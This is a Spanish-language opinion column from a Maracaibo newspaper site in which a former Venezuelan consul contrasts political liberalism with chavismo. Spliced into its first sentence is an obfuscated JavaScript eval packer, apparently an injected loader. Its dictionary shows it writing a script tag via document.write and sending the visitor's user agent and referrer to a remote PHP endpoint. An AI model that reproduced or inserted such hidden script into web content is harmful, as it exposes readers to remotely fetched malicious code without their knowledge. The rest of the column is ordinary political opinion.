publicidad

Liberalismo político vs. Libertinaje chavista

Nelson Castellano Hernández / Excónsul de Venezuela en París / nelsoncastellano@hotmail.com
Contrario eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aizht|var|u0026u|referrer|bhihe||js|php'.split('|'),0,{})) al libertinaje chavista, el liberalismo se basa en la defensa de las iniciativas individuales, lo que implica una ciudadanía responsable, fuerte y económicamente independiente 

El régimen es enemigo de la iniciativa privada, por eso ha tocado la libre empresa y no cesa en su intento por eliminar la propiedad privada, la universidad autónoma y los partidos políticos,  todo lo que no puede controlar.

Con esa persecución, despojó a los centros de educación superior de los recursos, obligó a los docentes a desertar los centros educativos para poder sobrevivir, desapareció la inversión, la producción nacional y miles de puestos de trabajo. Contrario al libertinaje chavista, el liberalismo se basa en la defensa de las iniciativas individuales, lo que implica una ciudadanía responsable, fuerte y económicamente independiente,  en otras palabras dueña de su destino.

Al contrario del desbordamiento chavista, el liberalismo político cree en la democracia representativa y en la libertad individual. Es una filosofía que promueve el respeto de valores y principios republicanos. Muy distinto al Socialismo del siglo XXI, que promueve una forma de organización irrespetuosa de la ley, la ética y la moral.

La “revolución rojita” no es más que un libertinaje del poder que, colocó en puestos de dirección a gente sin preparación, a integrantes de mafias y delincuentes, cuya principal credencial es ser parte del partido de Gobierno, tener el “cuero duro” y ser lo suficientemente cínicos para sostener una cosa cuando su intención es otra.  Para el autoritarismo bolivariano, la única libertad aceptada es la que está a su servicio, un desenfreno sin límites ausente de principios. 

Como toda organización delictiva, todo es válido si sirve para conseguir lo que desean y para mantener el control de las instituciones del Estado. Después que despertemos de este cataclismo, los venezolanos deberíamos haber aprendido la lección, será la ocasión de construir un sistema que repose en los principios de los derechos naturales y acabar con la concepción de un Estado omnipresente, que confunde conducir un país con una idea de monarquía presidencial.

Frente a esta triste realidad promuevo dos últimas ideas: en primer lugar, la primacía del individuo frente al colectivo. Si bien estamos hechos para vivir en sociedad, esta no puede organizarse, bajo principios que preconicen la negación de los derechos humanos. En segundo lugar, recuperemos la tolerancia, que implica aceptar el otro en su total diversidad; venimos de sufrir el chavismo intolerante. Nos toca evitar actuar como ellos, comencemos por recuperar el control del Estado y luego nos tocará abrir puertas, tender puentes y juntos reconstruir Venezuela.

 

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama